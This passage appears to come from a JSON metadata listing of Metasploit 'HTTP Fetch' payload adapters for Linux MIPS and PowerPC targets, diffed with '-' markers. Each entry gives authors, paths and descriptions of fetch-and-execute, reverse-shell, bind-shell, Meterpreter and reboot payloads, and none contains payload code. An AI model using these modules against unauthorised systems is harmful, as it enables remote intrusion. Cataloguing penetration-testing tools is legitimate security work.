"/modules/payloads/adapters/cmd/linux/http/mips64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mips64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": 
"cmd/linux/http/mips64", - "adapted_refname": "linux/mips64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/http/mips64/meterpreter_reverse_https": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/mips64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a MIPS64 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 13:20:59 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mips64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mips64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mips64", - "adapted_refname": "linux/mips64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/mips64/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/mips64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a MIPS64 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 13:20:59 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mips64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mips64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mips64", - "adapted_refname": "linux/mips64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/mipsbe/exec": { - "name": "HTTP Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/http/mipsbe/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "entropy " - ], - "description": "Fetch and execute an MIPSBE payload from an HTTP server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes.", - "references": [ - "EDB-17940" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsbe/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsbe", - "adapted_refname": "linux/mipsbe/exec", - "staged": false - }, - "payload_cmd/linux/http/mipsbe/meterpreter/reverse_tcp": { - "name": "HTTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/mipsbe/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, 
- "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsbe/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsbe/meterpreter", - "stager_refname": "linux/mipsbe/reverse_tcp" - }, - "payload_cmd/linux/http/mipsbe/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/mipsbe/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSBE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsbe/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/http/mipsbe/meterpreter_reverse_https": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/mipsbe/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - 
"description": "Fetch and execute an MIPSBE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsbe/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/mipsbe/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/mipsbe/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSBE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsbe/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/mipsbe/reboot": { - "name": "HTTP Fetch, Linux Reboot", - "fullname": "payload/cmd/linux/http/mipsbe/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", 
- "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "rigan - " - ], - "description": "Fetch and execute an MIPSBE payload from an HTTP server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes or executing\n other payloads that rely on initial startup procedures.", - "references": [ - "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsbe/reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsbe", - "adapted_refname": "linux/mipsbe/reboot", - "staged": false - }, - "payload_cmd/linux/http/mipsbe/shell/reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/mipsbe/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsbe/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - 
"needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsbe", - "adapted_refname": "linux/mipsbe/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsbe/shell", - "stager_refname": "linux/mipsbe/reverse_tcp" - }, - "payload_cmd/linux/http/mipsbe/shell_bind_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/http/mipsbe/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "scut", - "vaicebine", - "Vlatko Kosturjak", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsbe/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsbe", - "adapted_refname": "linux/mipsbe/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/http/mipsbe/shell_reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/mipsbe/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "rigan ", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nConnect back to attacker and spawn a command shell", - "references": [ - "EDB-18226" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, 
- "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsbe/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsbe", - "adapted_refname": "linux/mipsbe/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/mipsle/exec": { - "name": "HTTP Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/http/mipsle/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "entropy " - ], - "description": "Fetch and execute an MIPSLE payload from an HTTP server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.", - "references": [ - "EDB-17940" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsle/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsle", - "adapted_refname": "linux/mipsle/exec", - "staged": false - }, - "payload_cmd/linux/http/mipsle/meterpreter/reverse_tcp": { - "name": "HTTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/mipsle/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", 
- "Spencer McIntyre", - "Adam Cammack ", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsle/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsle", - "adapted_refname": "linux/mipsle/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsle/meterpreter", - "stager_refname": "linux/mipsle/reverse_tcp" - }, - "payload_cmd/linux/http/mipsle/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/mipsle/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsle/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsle", - "adapted_refname": "linux/mipsle/meterpreter_reverse_http", - "staged": false - }, - 
"payload_cmd/linux/http/mipsle/meterpreter_reverse_https": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/mipsle/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsle/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsle", - "adapted_refname": "linux/mipsle/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/mipsle/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/mipsle/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsle/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 
8, - "adapter_refname": "cmd/linux/http/mipsle", - "adapted_refname": "linux/mipsle/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/mipsle/reboot": { - "name": "HTTP Fetch, Linux Reboot", - "fullname": "payload/cmd/linux/http/mipsle/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "rigan - " - ], - "description": "Fetch and execute an MIPSLE payload from an HTTP server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes.", - "references": [ - "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsle/reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsle", - "adapted_refname": "linux/mipsle/reboot", - "staged": false - }, - "payload_cmd/linux/http/mipsle/shell/reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/mipsle/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 
13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsle/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsle", - "adapted_refname": "linux/mipsle/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsle/shell", - "stager_refname": "linux/mipsle/reverse_tcp" - }, - "payload_cmd/linux/http/mipsle/shell_bind_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/http/mipsle/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "scut", - "vaicebine", - "Vlatko Kosturjak", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsle/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsle", - "adapted_refname": "linux/mipsle/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/http/mipsle/shell_reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/mipsle/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - 
"rigan ", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsle/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsle", - "adapted_refname": "linux/mipsle/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/ppc/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/ppc/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an PPC payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:51:49 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/ppc.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/ppc/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/ppc", - "adapted_refname": "linux/ppc/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/http/ppc/meterpreter_reverse_https": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/ppc/meterpreter_reverse_https", - 
"aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an PPC payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:51:49 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/ppc.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/ppc/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/ppc", - "adapted_refname": "linux/ppc/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/ppc/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/ppc/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an PPC payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:51:49 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/ppc.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/ppc/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/ppc", - "adapted_refname": "linux/ppc/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/ppc64/shell_bind_tcp": { - "name": 
"HTTP Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/http/ppc64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an PPC64 payload from an HTTP server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:51:57 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/ppc64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/ppc64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/ppc64", - "adapted_refname": "linux/ppc64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/http/ppc64/shell_find_port": { - "name": "HTTP Fetch, Linux Command Shell, Find Port Inline", - "fullname": "payload/cmd/linux/http/ppc64/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an PPC64 payload from an HTTP server.\nSpawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:51:57 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/ppc64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/ppc64/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - 
"adapter_refname": "cmd/linux/http/ppc64", - "adapted_refname": "linux/ppc64/shell_find_port", - "staged": false - }, - "payload_cmd/linux/http/ppc64/shell_reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/ppc64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an PPC64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:51:57 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/ppc64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/ppc64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/ppc64", - "adapted_refname": "linux/ppc64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/ppc64le/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/ppc64le/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a PPC64LE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-19 18:10:55 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/ppc64le.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/ppc64le/meterpreter_reverse_http", 
- "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/ppc64le", - "adapted_refname": "linux/ppc64le/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/http/ppc64le/meterpreter_reverse_https": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/ppc64le/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a PPC64LE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-19 18:10:55 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/ppc64le.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/ppc64le/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/ppc64le", - "adapted_refname": "linux/ppc64le/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/ppc64le/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/ppc64le/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a PPC64LE payload from an HTTP server.", 